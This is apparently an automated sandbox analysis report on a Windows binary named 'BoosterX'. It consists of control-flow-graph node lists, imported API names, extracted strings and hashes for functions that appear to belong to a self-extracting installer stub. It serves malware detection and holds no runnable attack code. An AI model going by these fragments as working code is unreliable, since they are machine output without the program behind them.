7ff6c0356733-7ff6c0356740 call 7ff6c0354840 3811->3823 3824 7ff6c0356745-7ff6c0356749 3811->3824 3812->3811 3814 7ff6c0356685-7ff6c03566a9 3812->3814 3816 7ff6c03566ab 3814->3816 3817 7ff6c03566b2-7ff6c03566bf 3814->3817 3816->3817 3817->3811 3818 7ff6c03566c1-7ff6c03566c8 3817->3818 3818->3811 3823->3824 3826 7ff6c035675b-7ff6c0356772 call 7ff6c03878fc 3824->3826 3827 7ff6c035674b-7ff6c0356756 call 7ff6c035473c 3824->3827 3832 7ff6c0356777-7ff6c035677e 3826->3832 3833 7ff6c0356774 3826->3833 3834 7ff6c0356859-7ff6c0356860 3827->3834 3835 7ff6c03567a3-7ff6c03567ba call 7ff6c03878fc 3832->3835 3836 7ff6c0356780-7ff6c0356783 3832->3836 3833->3832 3837 7ff6c0356862-7ff6c0356872 call 7ff6c035433c 3834->3837 3838 7ff6c0356873-7ff6c035687b 3834->3838 3851 7ff6c03567bc 3835->3851 3852 7ff6c03567bf-7ff6c03567c6 3835->3852 3841 7ff6c035679c 3836->3841 3842 7ff6c0356785 3836->3842 3837->3838 3838->3719 3840 7ff6c0356881-7ff6c0356892 3838->3840 3845 7ff6c03568ad-7ff6c03568b2 call 7ff6c038218c 3840->3845 3846 7ff6c0356894-7ff6c03568a7 3840->3846 3841->3835 3847 7ff6c0356788-7ff6c0356791 3842->3847 3845->3719 3846->3676 3846->3845 3847->3835 3850 7ff6c0356793-7ff6c035679a 3847->3850 3850->3841 3850->3847 3851->3852 3852->3834 3854 7ff6c03567cc-7ff6c03567cf 3852->3854 3855 7ff6c03567e8-7ff6c03567f0 3854->3855 3856 7ff6c03567d1 3854->3856 3855->3834 3858 7ff6c03567f2-7ff6c0356826 call 7ff6c0368320 call 7ff6c0368558 call 7ff6c03684e8 3855->3858 3857 7ff6c03567d4-7ff6c03567dd 3856->3857 3857->3834 3859 7ff6c03567df-7ff6c03567e6 3857->3859 3858->3834 3866 7ff6c0356828-7ff6c0356839 3858->3866 3859->3855 3859->3857 3867 7ff6c035683b-7ff6c035684e 3866->3867 3868 7ff6c0356854 call 7ff6c038218c 3866->3868 3867->3670 3867->3868 3868->3834
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CMT
                                                    • API String ID: 0-2756464174
                                                    • Opcode ID: 3b349836db39cc0ffb878f66b914c5340b19c329b1b65cc42fc356a8d09ab802
                                                    • Instruction ID: e092937b5e4423125992e8b22e1e05d51746d14bc48c1114d3365994cb2d316d
                                                    • Opcode Fuzzy Hash: 3b349836db39cc0ffb878f66b914c5340b19c329b1b65cc42fc356a8d09ab802
                                                    • Instruction Fuzzy Hash: B342A82AB08683AAEB189F75C1502FD77A5AB55749F400236DB9ED37A6DF38E518C300
                                                    Function 00007FF6C036DF4C Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440libraryfileloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7ff6c036df4c-7ff6c036dfa0 call 7ff6c03823d0 GetModuleHandleW 3 7ff6c036dff7-7ff6c036e321 0->3 4 7ff6c036dfa2-7ff6c036dfb5 GetProcAddress 0->4 5 7ff6c036e327-7ff6c036e330 call 7ff6c038b708 3->5 6 7ff6c036e47f-7ff6c036e49d call 7ff6c0366414 call 7ff6c0367db4 3->6 7 7ff6c036dfb7-7ff6c036dfc6 4->7 8 7ff6c036dfcf-7ff6c036dfe2 GetProcAddress 4->8 5->6 16 7ff6c036e336-7ff6c036e379 call 7ff6c0366414 CreateFileW 5->16 19 7ff6c036e4a1-7ff6c036e4ab call 7ff6c0365164 6->19 7->8 8->3 9 7ff6c036dfe4-7ff6c036dff4 8->9 9->3 22 7ff6c036e46c-7ff6c036e47a CloseHandle call 7ff6c0351fa0 16->22 23 7ff6c036e37f-7ff6c036e392 SetFilePointer 16->23 27 7ff6c036e4ad-7ff6c036e4b8 call 7ff6c036dd04 19->27 28 7ff6c036e4e0-7ff6c036e528 call 7ff6c03878fc call 7ff6c035129c call 7ff6c0368050 call 7ff6c0351fa0 call 7ff6c036327c 19->28 22->6 23->22 25 7ff6c036e398-7ff6c036e3ba ReadFile 23->25 25->22 29 7ff6c036e3c0-7ff6c036e3ce 25->29 27->28 39 7ff6c036e4ba-7ff6c036e4de CompareStringW 27->39 66 7ff6c036e52d-7ff6c036e530 28->66 32 7ff6c036e77c-7ff6c036e783 call 7ff6c03825a4 29->32 33 7ff6c036e3d4-7ff6c036e428 call 7ff6c03878fc call 7ff6c035129c 29->33 48 7ff6c036e43f-7ff6c036e455 call 7ff6c036d05c 33->48 39->28 43 7ff6c036e539-7ff6c036e542 39->43 43->19 46 7ff6c036e548 43->46 49 7ff6c036e54d-7ff6c036e550 46->49 61 7ff6c036e42a-7ff6c036e43a call 7ff6c036dd04 48->61 62 7ff6c036e457-7ff6c036e467 call 7ff6c0351fa0 * 2 48->62 53 7ff6c036e5bb-7ff6c036e5be 49->53 54 7ff6c036e552-7ff6c036e555 49->54 57 7ff6c036e5c4-7ff6c036e5d7 call 7ff6c0367e70 call 7ff6c0365164 53->57 58 7ff6c036e73e-7ff6c036e77b call 7ff6c0351fa0 * 2 call 7ff6c03822a0 53->58 59 7ff6c036e559-7ff6c036e5a9 call 7ff6c03878fc call 7ff6c035129c call 7ff6c0368050 call 7ff6c0351fa0 call 7ff6c036327c 54->59 83 7ff6c036e5dd-7ff6c036e67d call 7ff6c036dd04 * 2 call 7ff6c036aaa0 call 7ff6c036da14 call 7ff6c036aaa0 call 7ff6c036dba8 call 7ff6c037872c call 7ff6c03519e0 57->83 84 7ff6c036e682-7ff6c036e6cf call 7ff6c036da14 AllocConsole 57->84 107 7ff6c036e5ab-7ff6c036e5b4 59->107 108 7ff6c036e5b8 59->108 61->48 62->22 72 7ff6c036e54a 66->72 73 7ff6c036e532 66->73 72->49 73->43 100 7ff6c036e730-7ff6c036e737 call 7ff6c03519e0 ExitProcess 83->100 94 7ff6c036e72c 84->94 95 7ff6c036e6d1-7ff6c036e726 GetCurrentProcessId AttachConsole call 7ff6c036e7e4 call 7ff6c036e7d4 GetStdHandle WriteConsoleW Sleep FreeConsole 84->95 94->100 95->94 107->59 112 7ff6c036e5b6 107->112 108->53 112->53
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                    • API String ID: 1496594111-2013832382
                                                    • Opcode ID: 2687c1cd523b65dc0cdc345ea7a2c039bde8b95e1f16db974beb6a896d2519a5
                                                    • Instruction ID: 6a176535134ec838a50cb710305ad0974224b7ba00534d446727715b9270745e
                                                    • Opcode Fuzzy Hash: 2687c1cd523b65dc0cdc345ea7a2c039bde8b95e1f16db974beb6a896d2519a5
                                                    • Instruction Fuzzy Hash: F632F835A09B83A9EB219F64E8411E933A4FF45359F500236DA8DC67A9EF3CE659C340
                                                    Function 00007FF6C036989C Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF6C0368E18: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C0368F4D
                                                    • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6C0369F35
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C036A3EF
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C036A3F5
                                                      • Part of subcall function 00007FF6C0370B3C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6C0370AC4), ref: 00007FF6C0370B69
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                    • API String ID: 3629253777-3268106645
                                                    • Opcode ID: 9426cd898b9218b2b25dcf31cc706f89de0b1c10041d7f527c3fd8ab1e9ee5ae
                                                    • Instruction ID: 2ba037f394a27334eec50bee73582e2b6d6417c7f21937a0c58efbb0fcf1a3a8
                                                    • Opcode Fuzzy Hash: 9426cd898b9218b2b25dcf31cc706f89de0b1c10041d7f527c3fd8ab1e9ee5ae
                                                    • Instruction Fuzzy Hash: 1962BC22A19B83A5EB10DF28C4482BD23A5FB45789F805132DA9EC77D5EF3DE945C740
                                                    Function 00007FF6C0381880 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1911 7ff6c0381880-7ff6c0381909 call 7ff6c03814d8 1914 7ff6c038190b-7ff6c038192f call 7ff6c03817e8 RaiseException 1911->1914 1915 7ff6c0381934-7ff6c0381951 1911->1915 1921 7ff6c0381b38-7ff6c0381b55 1914->1921 1917 7ff6c0381966-7ff6c038196a 1915->1917 1918 7ff6c0381953-7ff6c0381964 1915->1918 1920 7ff6c038196d-7ff6c0381979 1917->1920 1918->1920 1922 7ff6c038197b-7ff6c038198d 1920->1922 1923 7ff6c038199a-7ff6c038199d 1920->1923 1931 7ff6c0381b09-7ff6c0381b13 1922->1931 1932 7ff6c0381993 1922->1932 1924 7ff6c0381a44-7ff6c0381a4b 1923->1924 1925 7ff6c03819a3-7ff6c03819a6 1923->1925 1927 7ff6c0381a4d-7ff6c0381a5c 1924->1927 1928 7ff6c0381a5f-7ff6c0381a62 1924->1928 1929 7ff6c03819bd-7ff6c03819d2 LoadLibraryExA 1925->1929 1930 7ff6c03819a8-7ff6c03819bb 1925->1930 1927->1928 1933 7ff6c0381a68-7ff6c0381a6c 1928->1933 1934 7ff6c0381b05 1928->1934 1935 7ff6c0381a29-7ff6c0381a32 1929->1935 1936 7ff6c03819d4-7ff6c03819e7 GetLastError 1929->1936 1930->1929 1930->1935 1943 7ff6c0381b15-7ff6c0381b26 1931->1943 1944 7ff6c0381b30 call 7ff6c03817e8 1931->1944 1932->1923 1941 7ff6c0381a9b-7ff6c0381aae GetProcAddress 1933->1941 1942 7ff6c0381a6e-7ff6c0381a72 1933->1942 1934->1931 1937 7ff6c0381a3d 1935->1937 1938 7ff6c0381a34-7ff6c0381a37 FreeLibrary 1935->1938 1945 7ff6c03819e9-7ff6c03819fc 1936->1945 1946 7ff6c03819fe-7ff6c0381a24 call 7ff6c03817e8 RaiseException 1936->1946 1937->1924 1938->1937 1941->1934 1950 7ff6c0381ab0-7ff6c0381ac3 GetLastError 1941->1950 1942->1941 1947 7ff6c0381a74-7ff6c0381a7f 1942->1947 1943->1944 1953 7ff6c0381b35 1944->1953 1945->1935 1945->1946 1946->1921 1947->1941 1951 7ff6c0381a81-7ff6c0381a88 1947->1951 1955 7ff6c0381ada-7ff6c0381b01 call 7ff6c03817e8 RaiseException call 7ff6c03814d8 1950->1955 1956 7ff6c0381ac5-7ff6c0381ad8 1950->1956 1951->1941 1958 7ff6c0381a8a-7ff6c0381a8f 1951->1958 1953->1921 1955->1934 1956->1934 1956->1955 1958->1941 1961 7ff6c0381a91-7ff6c0381a99 1958->1961 1961->1934 1961->1941
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                    • String ID: H
                                                    • API String ID: 3432403771-2852464175
                                                    • Opcode ID: c747dab0563719ebcac82db4dc8ab060d8be692e48dcdd0dd925af41b53a7671
                                                    • Instruction ID: a1468e630065cc1cda865ee037cc4ba97b51f23d1fd821adfe7e9f3a3b5aff46
                                                    • Opcode Fuzzy Hash: c747dab0563719ebcac82db4dc8ab060d8be692e48dcdd0dd925af41b53a7671
                                                    • Instruction Fuzzy Hash: C2914A22A15B13AAEB54CF65D8446AC33A9FB08B8AF454636DE8DD7754EF3CE445C300
                                                    Function 00007FF6C037F460 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1989 7ff6c037f460-7ff6c037f4a3 1990 7ff6c037f4a9-7ff6c037f4e5 call 7ff6c0383c70 1989->1990 1991 7ff6c037f814-7ff6c037f839 call 7ff6c0351fa0 call 7ff6c03822a0 1989->1991 1997 7ff6c037f4ea-7ff6c037f4f1 1990->1997 1998 7ff6c037f4e7 1990->1998 2000 7ff6c037f4f3-7ff6c037f4f7 1997->2000 2001 7ff6c037f502-7ff6c037f506 1997->2001 1998->1997 2002 7ff6c037f4fc-7ff6c037f500 2000->2002 2003 7ff6c037f4f9 2000->2003 2004 7ff6c037f50b-7ff6c037f516 2001->2004 2005 7ff6c037f508 2001->2005 2002->2004 2003->2002 2006 7ff6c037f51c 2004->2006 2007 7ff6c037f5a8 2004->2007 2005->2004 2009 7ff6c037f522-7ff6c037f529 2006->2009 2008 7ff6c037f5ac-7ff6c037f5af 2007->2008 2010 7ff6c037f5b7-7ff6c037f5ba 2008->2010 2011 7ff6c037f5b1-7ff6c037f5b5 2008->2011 2012 7ff6c037f52b 2009->2012 2013 7ff6c037f52e-7ff6c037f533 2009->2013 2016 7ff6c037f5e0-7ff6c037f5f3 call 7ff6c036636c 2010->2016 2017 7ff6c037f5bc-7ff6c037f5c3 2010->2017 2011->2010 2011->2016 2012->2013 2014 7ff6c037f565-7ff6c037f570 2013->2014 2015 7ff6c037f535 2013->2015 2021 7ff6c037f575-7ff6c037f57a 2014->2021 2022 7ff6c037f572 2014->2022 2018 7ff6c037f54a-7ff6c037f550 2015->2018 2032 7ff6c037f618-7ff6c037f66d call 7ff6c03878fc call 7ff6c035129c call 7ff6c0363268 call 7ff6c0351fa0 2016->2032 2033 7ff6c037f5f5-7ff6c037f613 call 7ff6c0371344 2016->2033 2017->2016 2019 7ff6c037f5c5-7ff6c037f5dc 2017->2019 2023 7ff6c037f537-7ff6c037f53e 2018->2023 2024 7ff6c037f552 2018->2024 2019->2016 2026 7ff6c037f83a-7ff6c037f841 2021->2026 2027 7ff6c037f580-7ff6c037f587 2021->2027 2022->2021 2028 7ff6c037f543-7ff6c037f548 2023->2028 2029 7ff6c037f540 2023->2029 2024->2014 2030 7ff6c037f846-7ff6c037f84b 2026->2030 2031 7ff6c037f843 2026->2031 2034 7ff6c037f58c-7ff6c037f592 2027->2034 2035 7ff6c037f589 2027->2035 2028->2018 2037 7ff6c037f554-7ff6c037f55b 2028->2037 2029->2028 2038 7ff6c037f84d-7ff6c037f854 2030->2038 2039 7ff6c037f85e-7ff6c037f866 2030->2039 2031->2030 2056 7ff6c037f6c2-7ff6c037f6cf ShellExecuteExW 2032->2056 2057 7ff6c037f66f-7ff6c037f6bd call 7ff6c03878fc call 7ff6c035129c call 7ff6c0365b20 call 7ff6c0351fa0 2032->2057 2033->2032 2034->2026 2036 7ff6c037f598-7ff6c037f5a2 2034->2036 2035->2034 2036->2007 2036->2009 2042 7ff6c037f55d 2037->2042 2043 7ff6c037f560 2037->2043 2044 7ff6c037f859 2038->2044 2045 7ff6c037f856 2038->2045 2046 7ff6c037f86b-7ff6c037f876 2039->2046 2047 7ff6c037f868 2039->2047 2042->2043 2043->2014 2044->2039 2045->2044 2046->2008 2047->2046 2058 7ff6c037f7c6-7ff6c037f7ce 2056->2058 2059 7ff6c037f6d5-7ff6c037f6df 2056->2059 2057->2056 2064 7ff6c037f802-7ff6c037f80f 2058->2064 2065 7ff6c037f7d0-7ff6c037f7e6 2058->2065 2061 7ff6c037f6e1-7ff6c037f6e4 2059->2061 2062 7ff6c037f6ef-7ff6c037f6f2 2059->2062 2061->2062 2066 7ff6c037f6e6-7ff6c037f6ed 2061->2066 2067 7ff6c037f6f4-7ff6c037f6ff call 7ff6c03be188 2062->2067 2068 7ff6c037f70e-7ff6c037f72d call 7ff6c03be1b8 call 7ff6c037fda4 2062->2068 2064->1991 2070 7ff6c037f7fd call 7ff6c038218c 2065->2070 2071 7ff6c037f7e8-7ff6c037f7fb 2065->2071 2066->2062 2072 7ff6c037f763-7ff6c037f770 CloseHandle 2066->2072 2067->2068 2088 7ff6c037f701-7ff6c037f70c ShowWindow 2067->2088 2068->2072 2097 7ff6c037f72f-7ff6c037f732 2068->2097 2070->2064 2071->2070 2076 7ff6c037f87b-7ff6c037f883 call 7ff6c0387884 2071->2076 2078 7ff6c037f785-7ff6c037f78c 2072->2078 2079 7ff6c037f772-7ff6c037f783 call 7ff6c0371344 2072->2079 2086 7ff6c037f7ae-7ff6c037f7b0 2078->2086 2087 7ff6c037f78e-7ff6c037f791 2078->2087 2079->2078 2079->2086 2086->2058 2093 7ff6c037f7b2-7ff6c037f7b5 2086->2093 2087->2086 2092 7ff6c037f793-7ff6c037f7a8 2087->2092 2088->2068 2092->2086 2093->2058 2096 7ff6c037f7b7-7ff6c037f7c5 ShowWindow 2093->2096 2096->2058 2097->2072 2099 7ff6c037f734-7ff6c037f745 GetExitCodeProcess 2097->2099 2099->2072 2100 7ff6c037f747-7ff6c037f75c 2099->2100 2100->2072
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                    • String ID: .exe$.inf$Install$p
                                                    • API String ID: 1054546013-3607691742
                                                    • Opcode ID: 98f894956b22e91467c786fab3bb2a7ad0780f0785066d173f3d7dba5a37177a
                                                    • Instruction ID: 40b19459d15f230cebbf0ed87b7aabdb6576dc03983c57adec1e65d372e347f9
                                                    • Opcode Fuzzy Hash: 98f894956b22e91467c786fab3bb2a7ad0780f0785066d173f3d7dba5a37177a
                                                    • Instruction Fuzzy Hash: D5C17B62F08A53A9FB14CF29DA4427923A1BF85B86F045535CA8DC7BA5DF3CE551C300
                                                    Function 00007FF6C037F024 Relevance: 16.6, APIs: 11, Instructions: 102windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                    • String ID:
                                                    • API String ID: 3569833718-0
                                                    • Opcode ID: 7d379054cb94ea220feff0600702c1a3525b366c45d8dc990373b330b6eb2c2b
                                                    • Instruction ID: 418c493e6f742c122c425f19ee54058554f9a3393abc939233c4776504fa3379
                                                    • Opcode Fuzzy Hash: 7d379054cb94ea220feff0600702c1a3525b366c45d8dc990373b330b6eb2c2b
                                                    • Instruction Fuzzy Hash: BD41DE25B14A43AAF7008F69E814BAA23A0EB89B9EF441135DD8EC7B95CF3DE4458740
                                                    Function 00007FF6C036B970 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2668 7ff6c036b970-7ff6c036b9a2 2669 7ff6c036b9a4-7ff6c036b9aa 2668->2669 2670 7ff6c036ba0f 2668->2670 2669->2670 2671 7ff6c036b9ac-7ff6c036b9c2 call 7ff6c036dd04 2669->2671 2672 7ff6c036ba16-7ff6c036ba23 2670->2672 2680 7ff6c036b9f8 2671->2680 2681 7ff6c036b9c4-7ff6c036b9f6 GetProcAddressForCaller GetProcAddress 2671->2681 2674 7ff6c036ba69-7ff6c036ba6c 2672->2674 2675 7ff6c036ba25-7ff6c036ba28 2672->2675 2677 7ff6c036ba86-7ff6c036ba8f GetCurrentProcessId 2674->2677 2678 7ff6c036ba6e-7ff6c036ba7b 2674->2678 2675->2677 2679 7ff6c036ba2a-7ff6c036ba3a 2675->2679 2682 7ff6c036baa1-7ff6c036babb 2677->2682 2683 7ff6c036ba91-7ff6c036ba9f 2677->2683 2678->2682 2687 7ff6c036ba7d-7ff6c036ba84 2678->2687 2679->2682 2688 7ff6c036ba3c 2679->2688 2684 7ff6c036b9ff-7ff6c036ba0d 2680->2684 2681->2684 2683->2682 2683->2683 2684->2672 2689 7ff6c036ba43-7ff6c036ba67 call 7ff6c035b67c call 7ff6c035ba60 call 7ff6c035b674 2687->2689 2688->2689 2689->2682
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                    • API String ID: 1389829785-2207617598
                                                    • Opcode ID: 76993cb25b15c21bbb9ba85500eed42f79ef62b9df03f1df33b6944fdfd5394b
                                                    • Instruction ID: d6d17fdaf12f484f752ad1c12fa8618abb0646ae17a6ffb8921b9c45ae3373b4
                                                    • Opcode Fuzzy Hash: 76993cb25b15c21bbb9ba85500eed42f79ef62b9df03f1df33b6944fdfd5394b
                                                    • Instruction Fuzzy Hash: EA314824A09A43B1FA14CF56E85417927A0FF49B96F051136CDCEC37A0EF7CE6858B44
                                                    Function 00007FF6C035EF20 Relevance: 11.0, APIs: 7, Instructions: 453COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
